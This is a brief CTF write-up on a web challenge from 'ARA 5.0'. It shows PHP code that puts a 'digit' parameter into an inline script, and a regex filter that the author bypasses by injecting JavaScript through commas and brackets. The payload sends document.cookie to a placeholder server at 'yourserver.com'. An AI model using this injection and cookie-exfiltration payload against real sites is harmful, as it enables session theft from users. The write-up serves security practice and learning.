Javascript Argument Injection to XSS bypass regex

from ARA 5.0 CTF CHALL Web:

given the index with xss vulnerability :

 <script>
        var multiply = function(a, b) {
            return a * b;
        }

        var result = multiply(7, <?php echo $digit; ?>);

        document.querySelector('.result').textContent = 'The result is: ' + result;
    </script>
Copy

with filter :

 $digit = $_GET['digit'];
    if ((int) $digit) {
        $digit = $_GET['digit'];
        if (preg_match('/[<>`~\\\'()]/', $digit)) {
            http_response_code(403);
            die('403 Forbidden');
        }
    } else {
        $digit = "0";
    }
Copy

how we can inject xss using digit and other allowed character?, we know preg match ban this word

1. <
2. >
3. `
4. ~
5. \ (backslash)
6. ' (single quote)
7. ( (opening parenthesis)
8. ) (closing parenthesis)

but [ and ]and , and + not banned

we can use the payload

number,javascriptcode number[javascriptcode]

here are my payload

1,location="https://yourserver.com?flag="+document.cookie or 1[location="https://yourserver.com?flag"+document.cookie]

dont forget encode the +

and paste in the bot , and get the flag.